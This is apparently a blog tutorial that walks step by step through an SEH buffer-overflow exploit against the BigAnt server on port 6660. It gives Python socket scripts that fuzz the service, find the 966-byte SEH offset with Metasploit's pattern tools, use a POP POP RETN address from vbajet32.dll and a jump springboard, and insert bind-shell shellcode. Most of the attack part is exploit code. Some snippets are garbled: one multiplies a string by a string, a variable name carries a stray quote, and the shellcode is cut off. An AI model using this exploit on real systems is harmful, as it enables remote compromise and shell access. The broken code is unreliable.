Jumat, 11 Januari 2013

FUZZING SEH

Posted on by Bin Sahi with No comments
Now, we will try exploit BigAnt Application. Let's try it step by step..
First, prepare  the fuzzing
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

after that, run BigAnt

then, open OllyDbg and Attach BigAnt applications. Choose AntServer

Run a fuzzer. To see the results, select the tab view - SEH Chain. And The result is

in the image above, BigAnt 2500 crash with a buffer that we send. The results are shown with the number 41 as shown above.

Next, try to make the pattern of 2500 byte through # pattern_create
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 2500

enter the result into the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41" * "Aa0Aa1Aa2Aa3A . ." #patter_create 2500
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_add"ress, target_port))
sock.send(buffer)
sock.close()

after that try restarting OllyDbg and BigAnt and rerun fuzzernya. So the result

after the result has been that we can, try to insert into # pattern_offset
root @ bt :/ opt/metasploit/msf3/tools #. / pattern_offset.rb 42326742
966

conclusion is that it takes the value buffer of 966 bytes for the SEH.

After we have the address that used for SEH, enter the address that has a command offset vbajet32dll POP, RETN POP into fuzzer.
To get the offset address vbajet32dll, select the tab view-executable modules - double click VBAJET32. After that, right click - search for - sequence of command. Tyep as below



and the result is

Try doing a Break Point before run fuzzer.  If the result is true

press Shift + f9 to process into memory vbajet32dl. Then press f7 to RETN command.


we need 6 springboard, while memory space that is there is only 4 bytes.
Therefore, it takes 2 bytes to achieve it. So we must modifications the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2500 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

do breakpoint as before, so the result is


next is to create shellcode or payload with tools # msfweb
root @ bt :/ pentest/exploits/framework2 #. / msfweb
+ ---- = [Metasploit Framework Web Interface (127.0.0.1:55555)

enter the IP address above into your browser

insert the result of Genarate Payload into the Fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 16
buffer+= ("\xda\xdf\x29\xc9 . .) #Bind Shell
buffer+= "\x90" * (2500 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

SUCCESSFULLY


GOODLUCK FOR YOUR TRY HARDER !!!

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)